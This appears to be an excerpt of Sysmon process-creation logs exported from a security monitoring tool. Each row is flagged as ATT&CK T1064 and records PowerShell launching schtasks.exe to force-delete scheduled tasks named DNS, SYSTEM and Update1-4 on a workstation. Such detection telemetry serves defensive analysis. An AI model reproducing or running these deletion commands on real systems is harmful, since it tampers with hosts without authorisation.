C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.098191200Z"",""eventRecordID"":""3318"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.095\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00103ce02b00}\r\nProcessId: 5048\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.095"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00103ce02b00}"",""processId"":""5048"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.616",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.069 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010adde2b00} +ProcessId: 6252 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.071746900Z"",""eventRecordID"":""3317"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.069\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010adde2b00}\r\nProcessId: 6252\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:34.069"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010adde2b00}"",""processId"":""6252"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.558",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.041 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001013dd2b00} +ProcessId: 5016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.043910500Z"",""eventRecordID"":""3316"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.041\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001013dd2b00}\r\nProcessId: 5016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.041"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001013dd2b00}"",""processId"":""5016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.519",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.016 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001046db2b00} +ProcessId: 3664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.018445300Z"",""eventRecordID"":""3315"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.016\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001046db2b00}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.016"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001046db2b00}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.499",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.992 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108fd92b00} +ProcessId: 5996 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.995989200Z"",""eventRecordID"":""3314"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.992\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108fd92b00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.992"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00108fd92b00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:20:04.487",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.964 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d6d72b00} +ProcessId: 4656 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.968220000Z"",""eventRecordID"":""3313"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.964\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d6d72b00}\r\nProcessId: 4656\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.964"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010d6d72b00}"",""processId"":""4656"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.446",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.939 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00103dd62b00} +ProcessId: 4340 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 
